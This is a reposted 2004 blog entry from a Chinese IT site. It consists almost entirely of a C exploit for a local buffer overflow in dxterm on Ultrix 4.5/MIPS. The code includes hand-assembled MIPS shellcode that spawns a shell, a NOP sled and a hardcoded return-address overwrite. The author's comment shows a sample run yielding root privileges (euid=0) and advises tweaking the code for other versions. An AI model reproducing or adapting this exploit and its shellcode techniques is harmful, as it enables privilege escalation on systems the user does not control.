ITPub博客

首页 > IT基础架构 > 网络安全 > Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit

Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit

原创 网络安全 作者:coolwinds 时间:2004-12-20 20:06:18 0 删除 编辑
/* Ultrix 4.5/MIPS dxterm exploit
   by ztion in 2004
   Greets to: Stok, sidez

   It wasn't possible to use '/' in the shellcode. Probably dxterm only
   copies everything after the last slash, as it expects a path.
   Since everything is pretty much hardcoded, you will probably have to
   tweak it for versions other than 4.5

   nora> ./ultrix_dxterm_4.5_exploit
   $ id
   uid=268(ztion) gid=15(users)euid=0(root)
*/

[@more@]
#include 

#define NOP 0x25f8e003
#define RET 0x7fffbe90

char shellcode[] = {
	0x69,0x6e,0x19,0x3c,	/* lui	 $t9, 0x6e69 */
	0x2e,0x61,0x39,0x37,	/* ori	 $t9, $t9, 0x612e */
	0x38,0x01,0xb6,0x23,	/* addi	 $s6, $sp, 312 */
	0x01,0x01,0x39,0x23,	/* addi	 $t9, $t9, 0x0101 */
	0xf0,0xfe,0xd9,0xae,	/* sw	 $t9, -272($s6) */
	0x73,0x68,0x19,0x3c,	/* lui	 $t9, 0x6873 */
	0x11,0x11,0x06,0x24,	/* li	 $a2, 0x1111 */
	0x11,0x11,0xc6,0x38,	/* xori	 $a2, $a2, 0x1111 */
	0x2e,0x2e,0x39,0x37,	/* ori	 $t9, $t9, 0x2e2e */
	0xf0,0xfe,0xc4,0x26,	/* addiu $a0, $s6, -272 */
	0x01,0x01,0x39,0x23,	/* addi	 $t9, $t9, 0x0101 */
	0x3f,0x01,0x02,0x24,	/* li	 $v0, 319 */
	0xfc,0xfe,0x42,0x20,	/* addi	 $v0, $v0, -260 */
	0xf4,0xfe,0xd9,0xae,	/* sw	 $t9, -268($s6) */
	0xe8,0xfe,0xc4,0xae,	/* sw	 $a0, -280($s6) */
	0xf8,0xfe,0xc6,0xae,	/* sw	 $a2, -264($s6) */
	0xec,0xfe,0xc6,0xae,	/* sw	 $a2, -276($s6) */
	0xe8,0xfe,0xc5,0x26,	/* addiu $a1, $s6, -280 */
	0xcc,0xff,0xff,0x01	/* syscall */

};

int main(void)
{
	char buf[256];
	int i;


	memset (buf, 2, 255);
	i = 0;
	while (i <= 8) {
		((int *)(buf+1))[i] = NOP;
		i++;
	}

	memcpy (buf+33, shellcode, sizeof(shellcode));

	((int *)(buf+3))[29] = RET;
	/* 119 - 122 is the return address */
	buf[123] = '';

	execl ("/usr/bin/dxterm", "dxterm", "-display", "localhost:0", "-setup", buf, NULL);
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-785343/,如需转载,请注明出处,否则将追究法律责任。

下一篇: Santy.A - phpBB
请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    950347